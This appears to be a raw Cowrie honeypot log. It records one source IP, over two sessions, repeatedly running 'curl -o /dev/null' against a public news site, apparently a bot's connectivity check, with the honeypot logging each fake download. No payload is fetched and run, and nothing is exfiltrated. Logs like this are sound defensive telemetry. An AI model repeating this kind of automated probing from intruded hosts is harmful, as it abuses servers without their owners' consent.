{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:55.418109Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:55.420646Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:55.421865Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:55.422741Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:55.444212Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:55.449103Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:55.455872Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:55.456752Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:55.462065Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:55.463331Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:55.464077Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:55.487299Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:55.490946Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:55.492121Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:55.497014Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:55.502100Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:55.503015Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:55.520980Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:55.529644Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:55.530774Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:55.541045Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:55.541944Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:55.564521Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:55.566301Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:55.567230Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:55.579319Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:55.580232Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:55.603704Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:55.604686Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:55.607577Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:55.618713Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:55.620185Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:55.621554Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:55.631646Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:55.643272Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:55.644446Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:55.651441Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:55.660307Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:55.661167Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:55.662903Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:55.678705Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:55.679783Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:55.683014Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:55.699727Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:55.700644Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:55.704684Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:55.715948Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:55.719685Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:55.720562Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:55.726739Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:55.737756Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:55.740829Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:55.741590Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:55.753394Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:55.756901Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:55.757767Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:55.779375Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:55.780254Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:55.783184Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:55.789625Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:55.797416Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:55.798274Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:55.817776Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:55.818618Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:55.834628Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:55.835539Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:55.838164Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:55.847847Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:55.857520Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:55.866703Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:55.867579Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:55.879888Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:55.880707Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:55.893359Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:55.903639Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:55.906907Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:55.907695Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:55.920843Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:55.922060Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:55.942098Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:55.947802Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:55.948859Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:55.951854Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:55.959226Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
